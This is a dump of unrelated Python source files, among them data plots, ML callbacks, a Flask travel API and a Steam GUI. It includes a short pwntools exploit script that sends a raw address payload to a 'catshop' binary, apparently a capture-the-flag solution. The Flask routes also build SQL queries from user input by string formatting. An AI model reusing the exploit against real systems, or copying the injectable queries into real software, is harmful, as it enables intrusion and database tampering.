text stringlengths 38 1.54M |
|---|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
avo = pd.read_csv("avocado.csv")
_df = pd.read_csv("merge.csv")
def plot_trend(region):
plt.clf()
avo[(avo.region == region) & (avo.type == "conventional")].AvgPrice.plot.line(label="conv")
avo[(avo.region == region) & (avo.type == "organic")].AvgPrice.plot.line(label="org")
plt.legend()
plt.savefig(f'img/{region}.png')
def plot_diff(region):
plt.clf()
_df[_df.region == region]['diff'].plot.line()
plt.savefig(f'img/{region}_diff.png')
def main():
for region in avo.region.unique():
plot_diff(region)
# plot_trend(region)
if __name__ == '__main__':
main() |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 11 15:06:05 2019
@author: Sergiy Horef
"""
#This is a swithcher class all it is doin is permanently changing
#places of a keys in the letters dictionary
class Switcher():
def __init__(self):
self = self
def switch(self, letters, letter_one, letter_two):
letters[letter_one], letters[letter_two] = letters.pop(letter_two), letters.pop(letter_one)
def __str__(self):
return 'This is a switcher, which switches {self.letter_one} with {self.letter_two}'.format(self=self)
def __repr__(self):
return '{self.__class__.__name__}({self.letters}, \'{self.letter_one}\', \'{self.letter_two}\')'.format(self=self) |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-08-27 18:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cars', '0002_auto_20160827_2331'),
]
operations = [
migrations.AddField(
model_name='car',
name='tyre_type',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='car',
name='acceleration',
field=models.FloatField(),
),
migrations.AlterField(
model_name='car',
name='front_brake_type',
field=models.CharField(max_length=30, null=True),
),
migrations.AlterField(
model_name='car',
name='rear_brake_type',
field=models.CharField(max_length=30, null=True),
),
migrations.AlterField(
model_name='car',
name='turning_radius',
field=models.FloatField(),
),
]
|
from pwn import *
#p = remote('211.117.60.76',8888)
elf = ELF('./catshop')
context(terminal = ['xterm', 'splitw'])
p = process('catshop')
#gdb = attach(p)
p.send(p32(1))
p.send(p32(2))
p.send(p32(4))
p.send(p32(5))
p.send('\xb6\x88\x04\x08\x00')
p.send(p32(3))
p.send(p32(3))
p.send(p32(3))
p.send(p32(3))
p.interactive()
|
from flask import Flask
from flaskext.mysql import MySQL
from flask import jsonify, json
from flask import request
from alg4 import TSP
import query
import firebase_admin
import requests
from firebase_admin import credentials, auth
from operator import itemgetter
import datetime
import public_config
app = Flask(__name__)
credential = credentials.Certificate("./travelbuddy-firebase.json")
firebase_app = firebase_admin.initialize_app(credential=credential)
_verify_password_url = 'https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword'
mysql = MySQL()
app.config['MYSQL_DATABASE_USER'] = public_config.db_user
app.config['MYSQL_DATABASE_PASSWORD'] = public_config.db_password
app.config['MYSQL_DATABASE_DB'] = public_config.db_name
app.config['MYSQL_DATABASE_HOST'] = public_config.db_host
mysql.init_app(app)
@app.route('/')
def hello_world():
return 'Hello World!'
@app.route('/register/', methods=["POST"])
def register_page():
error = ''
try:
if request.method == "POST":
jsonReq = request.get_json()
name = jsonReq['name']
email = jsonReq['email']
phone = jsonReq['phone']
password = jsonReq['password']
user = auth.create_user(display_name=name, email=email, phone_number=phone, password=password)
token = auth.create_custom_token(user.uid)
return json.jsonify({'success':1, 'token': token.decode('utf-8'), 'email': email, 'name': name, 'phone': phone})
return json.jsonify({'success':0})
except Exception as e:
#flash(e)
print ("error: " + str(e))
return json.jsonify({'success':0})
@app.route('/login/', methods=["POST"])
def login_page():
error = ''
try:
if request.method == "POST":
jsonReq = request.get_json()
print(jsonReq)
email = jsonReq['email']
password = jsonReq['password']
body = {'email': email, 'password': password}
params = {'key': public_config.firebase_api_key}
resp = requests.request('post', _verify_password_url, params=params, json=body)
if bool(resp.json().get('registered')):
user = auth.get_user_by_email(email)
return json.jsonify({'success': 1, 'email': user.email, 'name': user.display_name, 'uid': user.uid})
else:
return json.jsonify({'success': 0})
return json.jsonify({'success': 0})
except Exception as e:
# flash(e)
print("error: " + str(e))
return json.jsonify({'success': 0})
@app.route('/flights')
def get_flights():
origin = request.args.get('origin')
destination_number = int(request.args.get('destinationNumber'))
start_date = request.args.get('startDate')
destinations = dict()
for i in range(destination_number):
destinations[request.args.get('destination' + str(i))] = int(request.args.get('duration' + str(i)))
trip = origin, destinations, [start_date, start_date]
print(trip)
tsp = TSP(trip)
tsp.fromOrigin()
cheapestTrip = sorted(tsp.paths, key=itemgetter(0))[0]
response = dict()
response["success"] = 1
response["price"] = cheapestTrip[0]
response["flights"] = cheapestTrip[1]
print(cheapestTrip)
return jsonify(response)
@app.route('/addTrip/', methods=['POST'])
def add_trips_handler():
cmd = ''
try:
if request.method == "POST":
reqJson = request.get_json()
user_email = 'sample@gmail.com'
user_trip = 'MY TRIP'
date = datetime.date.today()
dateObj = datetime.datetime.strptime(str(date), '%Y-%m-%d')
date = dateObj.strftime('%Y-%m-%d')
if "email" in reqJson:
user_email = str(reqJson['email'])
if "trip" in reqJson:
user_trip = json.dumps(reqJson['trip'])[1:-1].replace("'", "\\'")
if "startDate" in reqJson:
date = str(reqJson['startDate'])
print(date)
# user_email = request.values.get('email', default="tobincolby@gmail.com", type=str)
# user_trip = request.values.get('trip', default="MY TRIP", type=str)
conn = mysql.connect()
cursor = conn.cursor()
cmd = "INSERT INTO flights (email, flight_info, start_date) VALUES ('{}','{}', '{}')".format(user_email, user_trip, date)
cursor.execute(cmd)
response = {}
# response['trip'] = str(user_trip)
response['email'] = user_email
response['success'] = 1
conn.commit()
return json.jsonify(response)
return json.jsonify({'success':0})
except Exception as e:
#flash(e)
print ("error: " + str(e))
return json.jsonify({'success':0, 'error': str(e), 'cmd': cmd})
@app.route('/trips/', methods=["GET"])
def trips_handler():
user_email = request.args.get('email', default="tobincolby@gmail.com", type=str)
conn = mysql.connect()
cursor = conn.cursor()
date = datetime.date.today()
dateObj = datetime.datetime.strptime(str(date), '%Y-%m-%d')
date = dateObj.strftime('%Y-%m-%d')
cursor.execute('SELECT * from flights WHERE email="{}" AND start_date >= "{}"'.format(user_email, date))
row = cursor.fetchone()
trips = []
while row is not None:
trips.append(row[2])
row = cursor.fetchone()
response = {}
response['flights'] = trips
response['success'] = 1
response['email'] = user_email
return json.jsonify(response)
@app.route('/restaurants/getByCity', methods=["GET"])
def restaurants_handler():
destinations = []
num_destinations = int(request.args.get('destNum'))
for i in range(num_destinations):
destinations.append(request.args.get('dest' + str(i)))
businesses = []
for destination in destinations:
businesses.extend(query.run_yelp_query(query.searchQuery(location=destination))["data"]["search"]["business"])
return json.jsonify({"business": businesses})
# destination = request.args.get('dest', default="JFK", type=str)
# cityInfo = Query.runLocationQuery(destination, ["cityname"])
# return json.jsonify(Query.run_yelp_query(Query.searchQuery(location=cityInfo[0]))["data"]["search"])
if __name__ == '__main__':
app.run()
|
# coding: utf-8
# É dobro
# (c) Héricles Emanuel, UFCG, Programação 1
num_1 = int(raw_input())
num_2 = int(raw_input())
if num_2 == num_1 / 2 or num_1 == num_2 / 2:
print "SIM"
else:
print "NAO" |
def hello():
print('hellooooo')
def greet():
print('still here')
def something(func):
func()
a = something(greet)
|
import numpy as np
import tensorflow as tf
from tensorflow.python.keras import models
from sklearn.metrics import confusion_matrix
# For validation on multiple scales
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator
from tensorflow.python.keras.utils import Sequence
'''
Callback for training with multiple validatons sets.
'''
class MultiVal(tf.keras.callbacks.Callback):
def __init__(self, val_data, val_target, batch_size):
super().__init__()
self.validation_data = val_data
self.validation_target = val_target
self.batch_size = batch_size
self.val_loss = []
self.val_acc = []
def on_epoch_end(self, epoch, logs={}):
for validation_data in self.validation_data:
loss, acc = self.model.evaluate(validation_data, y=self.validation_target, batch_size=self.batch_size, verbose=0)
self.val_loss.append(loss)
self.val_acc.append(acc)
def to_dict(self):
return {'val_loss': self.val_loss, 'val_acc': self.val_acc}
'''
Callback for assessing the contrubutinon of each scale to the merging.
'''
class TrackAddition(tf.keras.callbacks.Callback):
def __init__(self, val_data, num, batch_size, num_contrib):
super().__init__()
self.val_data = val_data
self.num = num
self.batch_size = batch_size
self.num_contrib = num_contrib
if self.num < len(self.val_data):
self.ind = np.random.choice(len(self.val_data), self.num, replace=False)
self.track_data = self.val_data[self.ind]
else:
self.ind = np.arange(len(self.val_data))
self.track_data = self.val_data
if self.num == 1:
self.track_data = self.track_data[..., np.newaxis]
# self.mean_contrib_1 = []
# self.std_contrib_1 = []
# self.mean_contrib_2 = []
# self.std_contrib_2 = []
self.mean_c = {}
self.std_c = {}
self.output = []
self.add_layers = []
self.ind_add = []
self.track_model = []
def set_data(self, ind, val_data):
self.ind = ind
self.val_data = val_data
def layers_ind(self):
if not self.add_layers:
self.add_layers = [layer.name for layer in self.model.layers if 'add' in layer.name][1:]
layers = [layer.name for layer in self.model.layers]
ind = np.where(np.isin(layers, self.add_layers))[0]
c = 0
for i in ind:
self.ind_add.append(np.arange(i-self.num_contrib, i+1, dtype='int'))
self.mean_c[f'c_{c}'] = []
self.std_c[f'c_{c}'] = []
c += 1
self.ind_add = [x for sublist in self.ind_add for x in sublist]
self.output = []
for i in self.ind_add:
self.output.append(self.model.get_layer(index=i).output)
print(self.output)
self.track_model = models.Model(inputs=self.model.input, outputs=self.output)
def on_train_begin(self, logs=None):
self.layers_ind()
def on_epoch_end(self, epoch, logs=None):
output = self.track_model.predict(self.track_data, batch_size=self.batch_size, verbose=0)
n = len(self.add_layers)
s = len(output) // n
for i in range(n):
total = np.sum(output[i*s + s-1], axis=(1, 2, 3))
m_c = []
s_c = []
for j in range(i*s, (i+1)*s-1):
m_c.append(np.mean(np.sum(output[j], axis=(1, 2, 3))/total, axis=0))
s_c.append(np.std(np.sum(output[j], axis=(1, 2, 3))/total, axis=0, ddof=1))
self.mean_c[f'c_{i}'].append(m_c)
self.std_c[f'c_{i}'].append(s_c)
def get_contrib(self):
return [self.mean_c, self.std_c]
'''
Callback for assessing convergence error of low and high components of the target function.
'''
class FilterError(tf.keras.callbacks.Callback):
def __init__(self, x_test, y_test, batch_size, delta, epochs, num_ckpts, num_samples=0.1):
if isinstance(num_samples, float):
self.num_samples = int(np.ceil(num_samples*len(y_test)))
else:
self.num_samples = num_samples
print(self.num_samples)
ind = np.random.choice(len(y_test), self.num_samples, replace=False)
self.x_test = x_test[ind]
self.y_test = y_test[ind]
self.batch_size = batch_size
self.delta = delta
self.epochs = epochs
self.num_ckpts = num_ckpts
self.ckpts = np.ceil(np.linspace(0, self.epochs-1, self.num_ckpts)).astype(int)
print(self.ckpts)
self.e_low = []
self.e_high = []
def error(self, y_pred):
G = np.array([x - self.x_test for x in self.x_test])
G = np.exp(-np.sum(np.square(G), axis=(2, 3, 4)) / (2 * self.delta))
G = G[..., np.newaxis]
y_low = np.sum(self.y_test[np.newaxis, ...] * G, axis=1) / np.sum(G, axis=1)
h_low = np.sum(y_pred[np.newaxis, ...] * G, axis=1) / np.sum(G, axis=1)
# print(G.shape, y_low.shape, h_low.shape)
y_high = self.y_test - y_low
h_high = y_pred - h_low
e_low = np.sqrt(np.sum(np.sum(np.power(y_low - h_low, 2), axis=1)) / np.sum(np.sum(np.power(y_low, 2), axis=1)))
e_high = np.sqrt(
np.sum(np.sum(np.power(y_high - h_high, 2), axis=1)) / np.sum(np.sum(np.power(y_high, 2), axis=1)))
return e_low, e_high
def error_loop(self, y_pred):
y_low = np.zeros_like(self.y_test)
h_low = np.zeros_like(self.y_test)
for i in range(len(self.y_test)):
G = np.exp(-np.sum(np.square(self.x_test[i] - self.x_test), axis=(1, 2, 3))/(2*self.delta))[..., np.newaxis]
y_low[i] = np.sum(self.y_test * G, axis=0) / np.sum(G)
h_low[i] = np.sum(y_pred * G, axis=0) / np.sum(G)
y_high = self.y_test - y_low
h_high = y_pred - h_low
e_low = np.sqrt(np.sum(np.sum(np.square(y_low - h_low), axis=1)) / np.sum(np.sum(np.square(y_low), axis=1)))
e_high = np.sqrt(np.sum(np.sum(np.square(y_high - h_high), axis=1)) / np.sum(np.sum(np.square(y_high), axis=1)))
return e_low, e_high
def on_epoch_end(self, epoch, logs=None):
if any(epoch == self.ckpts):
y_pred = self.model.predict(self.x_test, batch_size=self.batch_size)
# e_low, e_high = self.error(y_pred)
e_low, e_high = self.error_loop(y_pred)
self.e_low.append(e_low)
self.e_high.append(e_high)
def get_error(self):
num_reps = len(self.e_low) // self.num_ckpts
return np.reshape(self.e_low, [num_reps, self.num_ckpts]), np.reshape(self.e_high, [num_reps, self.num_ckpts])
'''
Callback for extracting a confusion matrix
'''
class ConfusionMatrixCB(tf.keras.callbacks.Callback):
def __init__(self, validation_generator):
self.validation_generator = validation_generator
def on_train_end(self, logs=None):
# y_true = self.validation_generator.labels[self.validation_generator.indexes]
y_true = self.validation_generator.y[self.validation_generator.indexes]
y_pred = np.argmax(self.model.predict_generator(self.validation_generator, verbose=0), axis=-1)
self.cm = confusion_matrix(y_true, y_pred)
def get_cm(self):
return self.cm
'''
Callback for removing skip-connections from a Top-Down model; removing the skip connections removes
a certail scale from the Top-Down model.
'''
class NegateSkipConnections(tf.keras.callbacks.Callback):
def __init__(self, test_data, layer_names):
self.test_data = test_data
self.layer_names = layer_names
self.test_acc = []
def get_layers(self):
self.skip_2 = [layer for layer in self.model.layers if layer.name == self.layer_names[0]][0]
self.orig_weights_2 = self.skip_2.get_weights()
self.weights_shape_2 = self.orig_weights_2[0].shape
self.skip_1 = [layer for layer in self.model.layers if layer.name == self.layer_names[1]][0]
self.orig_weights_1 = self.skip_1.get_weights()
self.weights_shape_1 = self.orig_weights_1[0].shape
print(self.weights_shape_2, self.weights_shape_1)
def on_train_end(self, logs=None):
self.get_layers()
zeros_2 = np.zeros(self.weights_shape_2)
zeros_2 = [zeros_2, zeros_2, zeros_2, np.ones_like(zeros_2)]
zeros_1 = np.zeros(self.weights_shape_1)
zeros_1 = [zeros_1, zeros_1, zeros_1, np.ones_like(zeros_1)]
# Original
_, acc = self.model.evaluate(self.test_data, verbose=0)
self.test_acc.append(acc)
# Setting mid skip to 0
self.skip_2.set_weights(zeros_2)
_, acc = self.model.evaluate(self.test_data, verbose=0)
self.test_acc.append(acc)
self.skip_2.set_weights(self.orig_weights_2)
# Setting high skip to 0
self.skip_1.set_weights(zeros_1)
_, acc = self.model.evaluate(self.test_data, verbose=0)
self.test_acc.append(acc)
# Setting both to 0
self.skip_2.set_weights(zeros_2)
_, acc = self.model.evaluate(self.test_data, verbose=0)
self.test_acc.append(acc)
# Restore
self.skip_1.set_weights(self.orig_weights_1)
self.skip_2.set_weights(self.orig_weights_2)
loss, acc = self.model.evaluate(self.test_data, verbose=0)
print(f"After restore loss:{loss}, acc:{acc}")
def get_test_acc(self):
return self.test_acc
'''
A custom augmentation generator.
'''
class AugmentationGenerator(Sequence):
def __init__(self, X, y, batch_size, shuffle=True):
self.X = X
self.y = y
self.batch_size = batch_size
self.shuffle = shuffle
self.index = np.arange(len(X), dtype=int)
self.checked = []
self.augmenter = ImageDataGenerator(
featurewise_center=False, samplewise_center=False, featurewise_std_normalization=False,
samplewise_std_normalization=False, zca_whitening=False, zca_epsilon=1e-06, rotation_range=0,
width_shift_range=0.1, height_shift_range=0.1, brightness_range=None, shear_range=0.0, zoom_range=0,
channel_shift_range=0., fill_mode='nearest', cval=0., horizontal_flip=True, vertical_flip=False,
rescale=None, preprocessing_function=None, data_format='channels_last', validation_split=0,
dtype='float32')
self.augmenter.fit(X)
self.on_epoch_end()
def __len__(self):
return int(np.ceil(len(self.X) / self.batch_size))
def __getitem__(self, index):
indexes = self.index[index * self.batch_size:(index + 1) * self.batch_size]
self.checked.extend(indexes)
return self.augmenter.flow(self.X[indexes], batch_size=len(indexes), shuffle=False).next(), self.y[indexes]
def on_epoch_end(self):
if len(np.unique(self.checked)) == len(self.X):
print("All checked")
self.checked = []
if self.shuffle:
np.random.shuffle(self.index)
'''
Callback for a 3-stage learning rate decay scheme.
'''
class scheduler_3_stage(tf.keras.callbacks.Callback):
def __init__(self, lr, num_epochs):
self.lr = lr
self.num_epochs = num_epochs
def __call__(self, epoch):
if epoch == int(np.ceil(0.5*self.num_epochs)) or epoch == int(np.ceil(0.8*self.num_epochs)):
self.lr *= 0.1
return self.lr
'''
Callback for a 4-stage learning rate decay scheme.
'''
class scheduler_4_stage(tf.keras.callbacks.Callback):
def __init__(self, lr, num_epochs):
self.lr = lr
self.num_epochs = num_epochs
def __call__(self, epoch):
if epoch == int(np.ceil(0.4*self.num_epochs)) or epoch == int(np.ceil(0.7*self.num_epochs)) \
or epoch == int(np.ceil(0.9*self.num_epochs)):
self.lr *= 0.2
return self.lr
|
from scipy.io import loadmat
import numpy as np
import pickle
import pandas as pd
news = loadmat('news.mat')
def get_params(Xtr, Ytr):
# finding w and b for each class
Ytr = Ytr.flatten()
theClasses = set(Ytr)#list of classes
totCnt = len(Ytr)
paramDict = {}
for theClass in theClasses:
idx = np.where(Ytr==theClass)[0]
cnt = len(idx)
xForThisClass = Xtr[idx]
mu = (1 + xForThisClass.sum(axis=0)) / ( 2 + cnt) #shoudl this be xForThisClass instead of x_1
pi = cnt/float(totCnt)
bias = np.log(pi) + np.log(1 - mu).sum() #lgo pi + sum of all log minus meu
weights = np.log(mu) - np.log(1 - mu) #log meu, log 1 - meu
paramDict[theClass] = {'bias':bias, 'weights':weights}
return paramDict
def get_error_rate(params, Xtest, Ytest):
#print "Xtest shape:", Xtest.shape
#print "Ytest shape:", Ytest.shape
total_count = len(Ytest)
wrong_count = 0
for testVector, testLabel in zip(Xtest, Ytest):
#print testVector
x = testVector
maxLL = float('-inf')
minLabel = None
for key, value in params.iteritems():
# make a prediction for input testVector
w = value['weights']
b = value['bias']
# print "weights shape:", w.shape, "bias shape:", b.shape, "x shape:", x.shape
# # np.dot(w, x) #### no! x is not a numpy array
# # w.dot(x) ###### x is not a numpy array
# # np.dot(w, x.to_array()) #### slow
# # w.dot(x.to_array()) #### same
# # x.dot(w)
pred = x.dot(w.T) + b #should pred label 1-20?
# if this prediction != testLabel, increment wrong_count
if pred > maxLL:
maxLL = pred
minLabel = key
#print "minlable", minLabel.shape
#print "Testlable", testLabel.shape
# print type(minLabel), type(testLabel[0])
if int(minLabel) != int(testLabel[0]):
wrong_count += 1
#print 'wrongcount:', wrong_count
errorRate = float(wrong_count) / total_count
#print errorRate
return errorRate
#which class has the highest w*x + b
Xtrain = news['data']
Ytrain = news['labels']
params = get_params(Xtrain, Ytrain)
#print "Training error:", get_error_rate(params, Xtrain, Ytrain)
Xtest = news['testdata']
Ytest = news['testlabels']
#print "Test error:", get_error_rate(params, Xtest, Ytest)
# print params
vocab = {}
with open("news.vocab") as f:
for key, line in enumerate(f):
key = key+1
val = line.replace("\n",'')
#(key, val) = line.split()
vocab[int(key)] = val
# for key, value in vocab.iteritems():
# print key, value
group = {}
with open("news.groups") as f:
for line in f:
(val, key) = line.split()
group[int(key)] = val
# print group
# paramTop = {}
# for key, value in params.iteritems():
# print key, ' - '#, value
# theWeights = value['weights']#.tolist()
# print type(theWeights)
# print theWeights
# words = theWeights.argsort()#.argsort()[-2:]#[::-1]
# #words = words[-2:]
# print words, type(words), words.shape
# paramTop[key] = {'top20words':words}
# print paramTop[key]
#dfv = pd.DataFrame(vocab)
#dfg = pd.DataFrame(group)
dfv = pd.read_csv("news.vocab",header=None)
dfv.columns = ['word']
dfv['vuid'] = dfv.index + 1
dfg = pd.read_csv("news.groups",header=None)
dfg.columns = ['topic'] #just delcare col names here
dfg['topic'] = dfg.topic.str.split(' ',1).str[0]
dfg['guid'] = dfg.index + 1
df = pd.DataFrame(params)
df = df.T
df['guid'] = df.index
print df.head(20)
print dfv.head(20)
print dfg.head(20)
df = df.merge(dfg, on='guid', how='left')
print df.head(20)
dfw = df[['weights']]
#dfw = dfw.apply(lambda x: pd.Series(x.split(',')))
dfw = dfw['weights'].tolist()
df_list = []
#dfw = pd.DataFrame(dfw)
for i, k in enumerate(dfw):
j = k.tolist()
df = pd.DataFrame(j)
df = df.T
df.columns = ['weights']
df['guid'] = i + 1
df['vuid'] = df.index + 1
df = df.sort('weights', ascending=False).head(20)
print df.head(25)
df_list.append(df)
df = pd.concat(df_list)
df = df.merge(dfv, on='vuid', how='left').merge(dfg, on='guid', how='left')
#df['guid'] = df.index + 1
#df = df.T
print df.head(25)
#print dfw#.head(20)
#df = df.groupby(['guid','vuid','word','topic']).head(20).reset_index(drop=True)
df.to_csv('hw1-2.csv',index=False)
#print df.head(25)
#print paramTop
# the weights, there's 60,000, find top 20
# grab top 20 indices in an array
# sort
# for i in news.groups:
# print the top 20 words.
|
import os
import threading
from tkinter import *
from tkinter import ttk
from tkinter.font import Font
from urllib.error import HTTPError
from PIL import ImageTk
from gevent.exceptions import LoopExit
from Grafieken import DataScherm
from EchoSensor import Sr04
from Loginbutton import LoginButton
from Neopixel import Neopixel
from Quicksort import Quicksort
from Schuifregister import Schuifregister
from Servo import Servo
from Statistiek import Statistiek
from SteamClientAPI import SteamClientAPI
from SteamWebAPI import SteamWebAPI
class SteamGUI:
def __init__(self, client):
""" Init functie van de class"""
self.client = client
self.username, self.password = self.client.get_credentials()
self.root = None
self.button = None
self.sr04 = None
self.Button = None
self.servo = None
self.favoriet = "begin"
self.status = None
self.onlinetimer = None
self.friendtimer = None
self.groot_font = None
self.titelframe = None
self.afsluitButton = None
self.berichtframe = None
self.user_label = None
self.favoriet_label = None
self.msg_button = None
self.clear_button = None
self.friendframe = None
self.treeview = None
self.online = None
self.schuifregister = None
self.selecteditem = None
self.runfriendlist = True
self.runonline = True
self.loginbutton = None
self.neopixel = None
self.onlinetimer = None
self.friendlist_timer = None
self.databutton = None
self.statistiekbutton = None
self.servobuttonframe = None
self.collijst = None
self.needs2bsorted = False
self.api = SteamWebAPI()
self.root = Tk()
self.root.attributes("-fullscreen", True)
self.open_gui(True)
self.start_sensoren(True)
self.start_gui()
def open_gui(self, stopbutton):
""" Deze functie laadt de gui objecten in."""
if os.environ.get('DISPLAY', '') == '':
os.environ.__setitem__('DISPLAY', ':0.0') # Fix voor raspberrypi
self.groot_font = Font(size=30)
bg = ImageTk.PhotoImage(file='pexels-photo-2763927.jpg')
background_label = Label(image=bg)
background_label.image = bg
background_label.place(x=0, y=0, relwidth=1, relheight=1)
bgcolor = "#4B0082"
self.titelframe = Label(font=self.groot_font, background=bgcolor, foreground="white", text="SteamPI Client")
self.databutton = Button(text="Data", command=self.open_data,
background=bgcolor, foreground="white", font=self.groot_font)
self.statistiekbutton = Button(text="Statistiek", command=self.open_statistiek,
background=bgcolor, foreground="white", font=self.groot_font)
self.berichtframe = Frame(background=bgcolor)
self.user_label = Label(self.berichtframe, font=self.groot_font, foreground="white", background=bgcolor,
text="Volg de status van een vriend.")
self.favoriet_label = Label(self.berichtframe, foreground="white", font=self.groot_font, background=bgcolor,
text="Huidige favoriet: Geen")
self.servobuttonframe = Frame(self.berichtframe, background=bgcolor)
self.msg_button = Button(self.servobuttonframe, text="Stel in", command=self.check_online,
background=bgcolor, foreground="white", font=self.groot_font)
self.clear_button = Button(self.servobuttonframe, text="Stop", command=self.timerstop,
background=bgcolor, foreground="white", font=self.groot_font)
if stopbutton:
self.afsluitButton = Button(text="Afsluiten", command=self.stop,
background=bgcolor, foreground="white", font=self.groot_font)
self.afsluitButton.pack(side=BOTTOM, pady=5)
self.titelframe.pack(side=TOP, pady=60, padx=30)
self.servobuttonframe.pack(side=BOTTOM, expand=1, fill=X, pady=5)
self.friendframe = Frame(self.berichtframe, background=bgcolor)
self.berichtframe.pack(pady=30, padx=30)
self.user_label.pack()
self.favoriet_label.pack()
self.msg_button.pack(side=LEFT)
self.clear_button.pack(side=RIGHT)
self.friendframe.pack()
self.databutton.pack(side=RIGHT)
self.statistiekbutton.pack(side=LEFT)
def clear_gui(self, afsluitbutton):
""" Deze functie maakt het scherm leeg. """
if afsluitbutton:
self.afsluitButton.forget()
self.titelframe.forget()
self.databutton.forget()
self.statistiekbutton.forget()
self.berichtframe.forget()
self.user_label.forget()
self.favoriet_label.forget()
self.msg_button.forget()
self.clear_button.forget()
self.friendframe.forget()
self.servobuttonframe.forget()
if self.treeview is not None:
self.treeview.forget()
self.treeview = None
def start_gui(self):
""" Deze functie start de mainloop"""
self.root.mainloop()
def start_sensoren(self, loginbtnstart):
""" Deze functie start de sensoren op, en vertraagt het programma"""
self.runfriendlist = True
self.runonline = True
self.toon_friendlist()
self.neopixel = Neopixel()
self.neopixel.speel_loginanimatie()
self.sr04 = Sr04(self.client, self.neopixel)
self.sr04.start()
if loginbtnstart:
self.loginbutton = LoginButton(self)
def stop_sensoren(self, loginbtndelete):
""" Deze functie sluit alle sensoren af. """
if self.neopixel is not None:
self.neopixel.speel_loguitanimatie()
if self.schuifregister is not None:
self.schuifregister.lichtjes(0)
self.favoriet = None
self.runfriendlist = False
self.runonline = False
if self.onlinetimer is not None:
self.onlinetimer.join(5)
if self.schuifregister is not None:
self.schuifregister.lichtjes(0)
if self.friendlist_timer is not None:
self.friendlist_timer.join(5)
if self.sr04 is not None:
self.sr04.stop()
if loginbtndelete:
if self.loginbutton is not None:
self.loginbutton.lights_out()
self.loginbutton = None
def toon_friendlist(self):
""" Deze functie laadt de vriendlijst uit steam,
stopt hem in een treeview en herheelt dit iedere 10 seconden."""
if self.runfriendlist:
try:
data = self.api.get_friend_list(steamid=self.client.get_client().steam_id.as_64)
except HTTPError:
return
online = 0
friendlist = []
try:
friendjson = data['friendslist']['friends']
for friend in friendjson:
try:
games = self.api.friendstatus(friend['steamid'])
status = games['response']['players'][0]['personastate']
naam = games['response']['players'][0]['personaname']
if not (status == 0 or status == 7):
online += 1
if status == 0:
status = "Offline"
elif status == 1:
status = "Online"
elif status == 2:
status = "Bezig"
elif status == 3:
status = "Afwezig"
elif status == 4:
status = "Slapend"
elif status == 5:
status = "Ruilzoekende"
elif status == 6:
status = "Spelzoekende"
elif status == 7:
status = "Fake offline"
elif status == 8:
status = "max"
else:
status = "onbekend"
friendlist.append([naam, status, friend['steamid']])
except KeyError:
pass
except KeyError:
pass
self.schuifregister = Schuifregister()
self.schuifregister.lichtjes(online)
if online != self.online:
self.online = online
koppen = ('Naam', 'Status')
if self.treeview is not None:
try:
self.treeview.delete(*self.treeview.get_children())
except TclError:
return
else:
try:
self.treeview = ttk.Treeview(self.friendframe, columns=koppen, show='headings')
except RuntimeError:
return
scrollbar = Scrollbar(self.friendframe)
self.treeview.config(yscrollcommand=scrollbar.set)
self.treeview.pack(expand=1, fill=BOTH)
scrollbar.config(command=self.treeview.yview)
self.collijst = []
for col in koppen:
self.collijst.append(col)
if self.treeview is not None:
self.treeview.heading(col, text=col,
command=self.treeview_sort_column)
else:
return
self.sorteer_data(friendlist)
if self.treeview is not None:
for friend in friendlist:
self.treeview.insert("", "end",
values=(friend[0], friend[1], friend[2]))
if self.selecteditem is not None:
for i in self.treeview.get_children():
try:
if self.treeview.item(i)['values'][2] == self.favoriet:
self.treeview.focus(i)
self.treeview.selection_set(i)
except TclError:
pass
self.sort_column_noclick()
self.friendlist_timer = threading.Timer(10, self.toon_friendlist)
self.friendlist_timer.deamon = True
self.friendlist_timer.start()
else:
return
else:
return
def stop(self):
""" Deze functie sluit de applicatie af. """
self.root.destroy()
self.stop_sensoren(True)
raise SystemExit
def check_online(self):
""" Deze functie volgt de geselecteerde gebruiker van de treeview, update iedere 2 seconden."""
if self.favoriet is not None and self.treeview is not None and self.runonline:
try:
self.selecteditem = self.treeview.focus()
if self.selecteditem == "":
return
except IndexError:
return
self.afsluitButton.forget()
try:
friend_name = self.treeview.item(self.selecteditem)['values'][0]
except IndexError:
return
except AttributeError:
return
except TclError:
return
favoriet = self.treeview.item(self.selecteditem)['values'][2]
if self.favoriet != favoriet:
self.favoriet = favoriet
self.favoriet_label["text"] = f"Huidige favoriet: {friend_name}"
servo = Servo()
data = self.api.friendstatus(self.favoriet)
status = data['response']['players'][0]['personastate']
if status != self.status:
servo.start_spel(status)
self.status = status
self.onlinetimer = threading.Timer(2, self.check_online)
self.onlinetimer.deamon = True
self.onlinetimer.start()
elif self.favoriet is None and self.treeview is not None and not self.runonline:
self.runonline = True
self.favoriet_label["text"] = f"Huidige favoriet: geen"
self.favoriet = "begin"
else:
return
def log_out(self):
""" Callback functie voor de button, logt de gebruiker uit en sluit alle sensoren af."""
try:
self.client.log_out()
except LoopExit:
pass
self.clear_gui(False)
self.stop_sensoren(False)
if self.friendlist_timer is not None:
self.friendlist_timer.join(5)
if self.onlinetimer is not None:
self.onlinetimer.join(5)
self.client = None
def log_in(self):
""" Callback functie voor de button, logt de gebruiker in en start de gui + sensoren op"""
self.neopixel.speel_loginanimatie()
self.client = SteamClientAPI(self.username, self.password)
self.client.open_client()
self.favoriet = "begin"
self.afsluitButton.forget()
self.open_gui(True)
self.start_sensoren(False)
def timerstop(self):
""" Deze fucntie stopt de check_gebruiker functie als er op de knop is gedrukt"""
if self.selecteditem is None or self.selecteditem == "":
return
self.favoriet = "begin"
self.runfriendlist = False
if self.treeview is not None:
self.treeview.forget()
self.clear_gui(True)
self.open_gui(True)
if self.onlinetimer is not None:
self.onlinetimer.join(5)
self.runfriendlist = True
self.toon_friendlist()
self.runonline = True
self.favoriet_label["text"] = f"Huidige favoriet: geen"
def open_data(self):
""" Deze functie opent het datascherm"""
self.stop_sensoren(True)
self.clear_gui(True)
self.neopixel.lights_out()
self.favoriet = "begin"
DataScherm(self.client, self.root, self)
def sorteer_data(self, data):
""" Deze funtie sorteert de ingevoerde data."""
quicksort = Quicksort(data)
quicksort.quicksortRecusrive(data, 0, len(data) - 1)
def treeview_sort_column(self):
